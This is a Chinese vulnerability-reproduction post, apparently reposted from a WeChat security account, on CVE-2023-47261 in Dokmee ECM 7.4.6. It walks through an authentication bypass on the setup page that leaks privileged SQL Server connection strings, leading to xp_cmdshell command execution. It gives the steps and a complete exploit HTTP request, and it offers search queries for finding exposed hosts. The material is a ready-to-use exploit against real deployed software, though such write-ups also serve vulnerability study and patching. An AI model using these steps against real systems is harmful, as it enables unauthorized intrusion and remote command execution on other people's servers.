本人非原创漏洞作者,文章仅作为知识分享用
一切直接或间接由于本文所造成的后果与本人无关
如有侵权,联系删除
产品简介
Dokmee ECM是一款国外企业内容管理 (ECM) 软件。每个公司的办公室每个角落都存放着文档、记录和档案。Dokmee 一系列解决方案可以帮助您高效地组织、保护和管理这些文件。支持的文件:PDF、TIFF、Word、Excel、Auto-CAD 绘图、电子邮件等。Dokmee 可以帮助您立即实现数字化并管理您的所有企业内容需求。
开发语言:ASP.Net
开发厂商:https://www.dokmee.com/
漏洞描述
Dokmee ECM 7.4.6 允许远程执行代码,因为对 GettingStarted/SaveSQLConnectionAsync /#/gettingstarted 请求的响应包含用于特权 SQL Server 数据库访问的连接字符串,并且可以启用 xp_cmdshell。
空间测绘
回复“CVE-2023-47261”获取空间测绘语句
漏洞利用
1.访问“http://xxx.xxx.xxx/#/gettingstarted”,若自动跳转至登陆就多访问几次。
2.点击“Setup”,后在“Enter Key”处输入“”绕过认证,点击“Next”。
3.随便输入配置,点击“Next”,响应包中返回了系统数据库配置,大部分连接数据库就可以xp_cmdshell了。
请求数据包如下:
POST /dws/GettingStarted/SaveSqlConnectionAsync HTTP/1.1
Host: xxx.xxx.xxx
Connection: close
Content-Length: 216
sec-ch-ua: "(Not(A:Brand";v="99", "Chromium";v="115", "Google Chrome";v="115"
Accept: application/json, text/plain, */*
Content-Type: text/plain
sec-ch-ua-mobile: ?0
API_KEY: MjAyMzEyMTU2MzgzODIxx4QMtsNzg3NjMzMzAwMDBiMzc1FqtkGfMTAyY2QxNzM0MjZkOWQwStQDfqMGMxZDBhOGIyZmRmYQ==G3k6W9r00qV1aTuxacjHyj9MQCHMSgftG2CHPzMoqvOwEnbk4Pp6RnuAVu7glpk3hcDA==
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5808.208 Safari/537.36
sec-ch-ua-platform: "macOS"
Origin: http://xxx.xxx.xxx
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://xxx.xxx.xxx/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
vVo2dxT8CZLPWAd4NTAPEsNz2YxD9Qgvqg9wPzUFHSnu0zC0P75Kx4Pfo7dtuGClku4SUTsmJN2wlUrhjOWnWOYgV/ru7vHzOD0Id/bMaVXBq7ovsLtkT9C1TFolLxvpIk58nq89DywgMj8aDAqYCPvGp22ecgIcdF2Nq9LRvPuI7MVvMEcldR5fucxLcHJO4BLUFBvStXaWMAC650v/6Q==
参考链接
https://nvd.nist.gov/vuln/detail/CVE-2023-47261
https://h3x0s3.github.io/CVE2023~47261/
回复“CVE-2023-47261”获取空间测绘语句
原文始发于微信公众号(不够安全):[漏洞复现]CVE-2023-47261 Dokmee ECM信息泄露致远程命令执行